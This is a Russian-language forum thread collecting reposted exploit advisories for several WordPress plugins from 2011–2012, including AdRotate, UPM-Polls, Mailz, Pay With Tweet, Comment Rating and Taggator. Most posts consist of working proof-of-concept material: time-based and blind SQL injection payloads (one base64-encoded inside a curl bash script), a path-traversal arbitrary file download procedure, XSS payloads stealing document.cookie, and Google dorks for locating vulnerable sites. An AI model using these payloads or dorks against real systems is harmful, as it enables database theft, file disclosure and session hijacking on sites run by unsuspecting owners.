    WordPress AdRotate plugin <= 3.6.6 SQL Injection

    # Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability
    # Date: 2011-11-8
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip
    # Version: 3.6.6 (tested)
    # Note: parameter $_GET["track"] has to be Base64 encoded


    PoC

    Код:
    http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
    e.g.
    Код:
    #!/bin/bash
    payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
    encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0`
    curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded

    Vulnerable code

    Код:
    if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = base64_decode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
    $bannerurl = $wpdb->get_var($wpdb->prepare("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = '".$ad."' LIMIT 1;")); //wrong (mis)usage of wpdb->prepare()
    (c) bugsearch
     
    15 ноя 2011
    1 человеку нравится это.
  17. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Wordpress UPM-POLLS Plugin 1.0.4 Blind SQL Injection


    Код:
    # Exploit Title: BLIND SQL injection UPM-POLLS wordpress plugin 1.0.4
    # Google Dork: n/a
    # Date: 04-12-2011
    # Author: Saif El-Sherei
    # Software Link: http://downloads.wordpress.org/plugin/upm-polls.1.0.4.zip
    # Version: 1.0.4
    # Tested on: wordpress 3.2.1,Firefox 4, XAMPP

    Info:

    Best Plugin to create Polls for your site. Everything is smoother, faster,
    and seamless like WordPress itself.

    Poll Manager,
    Ability to set general and post/page specific polls,
    Ability to leaf over the polls
    Ability to add certain poll in certain post content
    Ability to show polls either with and without current results of
    polls


    Details:

    the Variable PID is not properly sanitized in the get request before
    insertion into the database query; allowing an attaacker or any user who
    can view poll results (supposedly all user) to use blind sql injection to
    extract database data and possibly compromise the whole server. a POC is
    provided with both true and false results.

    POC 1(TRUE):

    Код:
    http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=upm_ayax_polls_result&do=result&post=1&type=general&PID=2and
    1=1
    "poll results for poll 2 is displayed"

    POC 2 (FALSE):

    Код:
    http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=upm_ayax_polls_result&do=result&post=1&type=general&PID=2and
    1=2
    "Blank page is displayed"

    (c) exploit-db.com​
     
    11 дек 2011
    1 человеку нравится это.
  18. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    #Exploit Title: Mailing List plugin for Wordpress Arbitrary file download
    #Version: < 1.4.2
    #Date: 2011-12-19
    #Author: 6Scan (http://6scan.com) security team
    #Software Link: http://wordpress.org/extend/plugins/mailz/
    #Official fix: This advisory is released after the vendor (http://www.zingiri.com) was contacted and fixed the issue promptly.
    #Description : Unauthorized users can download arbitrary files from the server using this exploit.
    #Vulnerable script includes config.php file, which connects to database with supplied credentials. Database entries are used to retrieve files from host.
    #The bug is in config.php, but accessible from other file.

    PoC

    1) Setup mysql database
    2) Create table with the next structure:


    Код:
    CREATE TABLE IF NOT EXISTS `phplist_attachment` (
      `filename` varchar(1024) NOT NULL,
      `mimetype` varchar(1024) NOT NULL,
      `remotefile` varchar(1024) NOT NULL,
      `description` varchar(1024) NOT NULL,
      `size` int(11) NOT NULL,
      `id` int(11) NOT NULL
    ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
    3) Add this raw into database:

    Код:
    INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES
    ('../../../../../somefile.txt', '', '', '', 0, 0);

    4) Call the script with database parameters and file id to download:

    Код:
    http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0
    The credentials are now saved in session, and there is no need to continue passing them:

    Код:
    http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=1
    http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=2
    http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=3
     
    26 дек 2011
  19. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Wordpress Pay With Tweet Plugin <= 1.1 Multiple Vulnerabilities



    # Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
    # Date: 01/06/2012
    # Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
    # Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
    # Version: 1.1


    1)
    Blind SQL Injection in shortcode:
    Short code parameter 'id' is prone to blind sqli,
    you need to be able to write a post/page to exploit this:

    Код:
    [paywithtweet id="1' AND 1=2"]
    [paywithtweet id="1' AND 1=1"]
    2)
    Multiple XSS in pay.php
    http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php

    After connecting to twitter:
    Код:
    ?link=&22></input>[XSS]
    After submitting the tweet:
    Код:
    ?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS]
    The final download link will be replaced with [REDIRECT-TO-URL]

    POC:
    Код:
    pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script>
    (c) exploit-db.com​

    Wordpress Comment Rating plugin Multiple Vulnerabilities


    # Exploit Title: Wordpress comment rating plugin multiple Vulnerabilities
    # Google Dork: 1- inurl:"/wp-content/plugins/comment-rating/"
    # 2- inurl:"/ck-processkarma.php?id="
    # Date: 2/1/2012
    # Author: The Evil Thinker
    # Contact : Enstene156@hotmail.fr
    # Software Link: www.wordpress.com
    # Vulnerable plugin: Comment rating plugin
    # Tested on: Linux


    Details :

    the vulnerable file is "ck-processkarma.php"
    the script doesn't filter the input parameters (id "sql", path "XSS")

    Poc 1 (XSS) :

    Код:
    http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=

    Poc 2 (SQL injection) :

    Код:
    http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=
     
    Последнее редактирование: 7 янв 2012
    7 янв 2012
  20. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Wordpress taggator plugin Sql Injection Vulnerabilities

    Код:
    #
    # Author : #BHG Security Center - IrIsT Security Team
    #
    # Discovered By : Am!r
    #
    # Home : http://Black-hg.Org - http://IrIsT.Ir
    #
    # Software Link : http://wordpress.org/extend/plugins/taggator/
    #
    # Security Risk : High
    #
    # Version : All Version
    #
    # Tested on : GNU/Linux Ubuntu - Windows Server - win7
    #
    # Dork : "Powered by Wordpress"
    #
    
    Expl0iTs :

    Код:
    http:/site.eu/wp-content/plugins/taggator/taggator.php?tagid=[Sql]
    (c) securityfocus
     
    6 апр 2012

Поделиться этой страницей

Загрузка...